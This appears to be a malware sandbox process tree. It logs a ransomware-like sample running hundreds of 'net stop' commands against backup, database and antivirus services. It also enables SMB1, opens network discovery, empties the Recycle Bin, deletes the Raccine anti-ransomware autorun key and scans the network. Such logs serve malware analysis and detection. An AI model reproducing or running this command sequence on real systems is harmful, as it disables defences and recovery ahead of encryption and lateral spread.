C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y4⤵PID:7116
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y4⤵PID:6684
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y4⤵PID:6456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y4⤵PID:6208
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y4⤵PID:5176
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y4⤵PID:6044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y4⤵PID:5908
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y4⤵PID:5808
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y4⤵PID:7456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y4⤵PID:7196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y4⤵PID:7072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y4⤵PID:7064
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y4⤵PID:7056
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y4⤵PID:7040
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y4⤵PID:7032
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /4⤵PID:7024
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y4⤵PID:7016
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y4⤵PID:7000
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵PID:6992
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y4⤵PID:6984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y4⤵PID:6976
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y4⤵PID:6968
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y4⤵PID:6944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y4⤵PID:6936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y4⤵PID:6928
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y4⤵PID:6920
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y4⤵PID:6912
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y4⤵PID:6904
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y4⤵PID:6896
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y4⤵PID:6888
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y4⤵PID:6872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y4⤵PID:6864
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y4⤵PID:6856
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y4⤵PID:6848
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y4⤵PID:6832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y4⤵PID:6824
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y4⤵PID:6816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y4⤵PID:6800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y4⤵PID:6792
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y4⤵PID:6784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y4⤵PID:6776
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y4⤵PID:6752
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y4⤵PID:6744
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y4⤵PID:6736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y4⤵PID:6728
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y4⤵PID:6712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y4⤵PID:6704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y4⤵PID:6696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y4⤵PID:6688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y4⤵PID:6672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵PID:6664
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y4⤵PID:6656
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y4⤵PID:6648
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y4⤵PID:6632
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y4⤵PID:6624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y4⤵PID:6616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y4⤵PID:6604
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y4⤵PID:6588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y4⤵PID:6580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y4⤵PID:6572
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y4⤵PID:6556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y4⤵PID:6548
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y4⤵PID:6540
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y4⤵PID:6532
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y4⤵PID:6516
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y4⤵PID:6508
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵PID:6500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y4⤵PID:6492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y4⤵PID:6476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y4⤵PID:6468
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y4⤵PID:6460
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y4⤵PID:6444
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y4⤵PID:6436
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y4⤵PID:6428
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y4⤵PID:6420
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y4⤵PID:6404
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵PID:6396
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y4⤵PID:6388
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:6380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y4⤵PID:6360
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y4⤵PID:6352
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y4⤵PID:6344
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y4⤵PID:6336
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y4⤵PID:6328
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵PID:6320
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y4⤵PID:6312
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y4⤵PID:6304
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y4⤵PID:6292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y4⤵PID:6276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y4⤵PID:6268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y4⤵PID:6252
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y4⤵PID:6244
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y4⤵PID:6236
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y4⤵PID:6228
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:6220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y4⤵PID:6212
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y4⤵PID:6196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y4⤵PID:6188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵PID:6172
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y4⤵PID:6164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵PID:6156
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y4⤵PID:6148
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y4⤵PID:5256
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y4⤵PID:5208
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y4⤵PID:3524
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y4⤵PID:3612
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:6140
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y4⤵PID:6132
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y4⤵PID:6124
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y4⤵PID:6112
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y4⤵PID:6104
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y4⤵PID:6088
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y4⤵PID:6080
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y4⤵PID:6072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y4⤵PID:6064
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y4⤵PID:6056
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y4⤵PID:6048
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y4⤵PID:6032
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y4⤵PID:6024
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y4⤵PID:6016
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y4⤵PID:6008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y4⤵PID:5992
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y4⤵PID:5984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y4⤵PID:5976
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:5968
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y4⤵PID:5960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y4⤵PID:5944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y4⤵PID:5936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y4⤵PID:5928
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y4⤵PID:5920
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y4⤵PID:5912
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y4⤵PID:5896
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y4⤵PID:5888
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y4⤵PID:5880
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y4⤵PID:5872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y4⤵PID:5864
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y4⤵PID:5856
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵PID:5840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y4⤵PID:5832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y4⤵PID:5824
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y4⤵PID:5816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y4⤵PID:5796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y4⤵PID:5788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:5772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y4⤵PID:5764
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y4⤵PID:5748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:5740
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y4⤵PID:5732
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y4⤵PID:5724
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:5716
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y4⤵PID:5704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y4⤵PID:5688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:5680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y4⤵PID:5672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y4⤵PID:5664
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:5656
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:5644
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y4⤵PID:5636
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵PID:5628
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y4⤵PID:5620
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y4⤵PID:5612
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5604
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y4⤵PID:5596
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y4⤵PID:5588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y4⤵PID:5580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y4⤵PID:5572
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y4⤵PID:5564
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y4⤵PID:5556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5548
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y4⤵PID:5540
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y4⤵PID:5532
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y4⤵PID:5524
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y4⤵PID:5516
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y4⤵PID:5508
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y4⤵PID:5500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y4⤵PID:5492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y4⤵PID:5480
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y4⤵PID:5472
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y4⤵PID:5464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y4⤵PID:5456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y4⤵PID:5444
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y4⤵PID:5436
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y4⤵PID:5428
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y4⤵PID:5420
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y4⤵PID:5412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y4⤵PID:5400
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y4⤵PID:5392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y4⤵PID:5384
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y4⤵PID:5376
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y4⤵PID:5368
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y4⤵PID:5360
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y4⤵PID:5348
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y4⤵PID:5340
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y4⤵PID:5328
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y4⤵PID:5320
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y4⤵PID:5308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y4⤵PID:5300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y4⤵PID:5292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y4⤵PID:5280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y4⤵PID:5272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y4⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view4⤵PID:2484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y4⤵PID:1772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y4⤵PID:1008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y4⤵PID:2904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y4⤵PID:2052
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y4⤵PID:1164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y4⤵PID:584
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y4⤵PID:4864
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵PID:5088
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto4⤵PID:2108
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto4⤵PID:1496
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto4⤵PID:2696
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes4⤵PID:4540
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵PID:220
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F4⤵PID:4652
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a4⤵PID:15872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.774⤵PID:14480
-
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵PID:3984
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:5124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:5168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:10968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:12276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵PID:12540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵PID:12780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵PID:12876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:13100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:10012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵PID:13344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵PID:14192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵PID:14572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:14952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵PID:15296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:15536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵PID:15880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵PID:15972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:15956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵PID:15948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵PID:15940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:15932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵PID:15868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵PID:15860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:15688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:15520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:15512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵PID:15504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:15492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵PID:15480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:15472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:15464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y1⤵PID:15456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:15448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:15436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵PID:15428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵PID:15420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵PID:15412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵PID:15404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵PID:15396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:15388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y1⤵PID:15380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵PID:15372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵PID:15364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵PID:12356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵PID:9612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵PID:1080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵PID:7352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:3052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵PID:5072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:4072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:13812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵PID:3084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵PID:3972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:15356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵PID:15348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵PID:15340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:15328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵PID:15320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:15312
-
